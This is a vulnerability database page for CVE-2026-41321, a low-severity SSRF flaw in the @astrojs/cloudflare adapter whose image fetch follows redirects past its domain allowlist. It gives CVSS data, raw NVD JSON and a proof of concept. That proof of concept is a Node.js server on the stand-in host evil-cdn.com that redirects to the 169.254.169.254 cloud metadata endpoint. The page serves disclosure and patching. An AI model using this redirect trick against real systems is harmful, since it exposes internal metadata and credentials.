Security Vulnerability Report
中文
CVE-2026-41321 CVSS 2.2 LOW

CVE-2026-41321

Published: 2026-04-24 18:16:29
Last Modified: 2026-04-27 18:53:00
Source: [email protected]

Description

@astrojs/cloudflare is an SSR adapter for use with Cloudflare Workers targets. Prior to 13.1.10, the fetch() call for remote images in packages/integrations/cloudflare/src/utils/image-binding-transform.ts uses the default redirect: 'follow' behavior. This allows the Cloudflare Worker to follow HTTP redirects to arbitrary URLs, bypassing the isRemoteAllowed() domain allowlist check which only validates the initial URL. This vulnerabiity is caused by an incomplete fix for CVE-2025-58179. This vulnerability is fixed in 13.1.10.

CVSS Details

CVSS Score
2.2
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

No configuration data available.

@astrojs/cloudflare < 13.1.10

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// PoC Concept: SSRF via Redirect Bypass // Attacker controls: http://evil-cdn.com (assumed whitelisted) // Target: http://169.254.169.254/latest/meta-data/ // 1. Malicious Server Configuration (Node.js example) const http = require('http'); const server = http.createServer((req, res) => { console.log('Request received from victim'); // Respond with a redirect to an internal resource res.writeHead(302, { 'Location': 'http://169.254.169.254/latest/meta-data/' }); res.end(); }); server.listen(80); // 2. Vulnerable Request Flow in Astro // The victim app requests: http://evil-cdn.com/image.jpg // // Code path in @astrojs/cloudflare: // - isRemoteAllowed('http://evil-cdn.com/image.jpg') -> Returns True (Domain is allowed) // - fetch('http://evil-cdn.com/image.jpg', { redirect: 'follow' }) // -> Receives 302 from evil-cdn.com // -> Automatically follows to http://169.254.169.254/latest/meta-data/ // -> Returns internal metadata to the attacker

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-41321", "sourceIdentifier": "[email protected]", "published": "2026-04-24T18:16:28.783", "lastModified": "2026-04-27T18:53:00.053", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "@astrojs/cloudflare is an SSR adapter for use with Cloudflare Workers targets. Prior to 13.1.10, the fetch() call for remote images in packages/integrations/cloudflare/src/utils/image-binding-transform.ts uses the default redirect: 'follow' behavior. This allows the Cloudflare Worker to follow HTTP redirects to arbitrary URLs, bypassing the isRemoteAllowed() domain allowlist check which only validates the initial URL. This vulnerabiity is caused by an incomplete fix for CVE-2025-58179. This vulnerability is fixed in 13.1.10."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:L", "baseScore": 2.2, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 0.7, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://github.com/withastro/astro/security/advisories/GHSA-88gm-j2wx-58h6", "source": "[email protected]"}, {"url": "https://github.com/withastro/astro/security/advisories/GHSA-88gm-j2wx-58h6", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.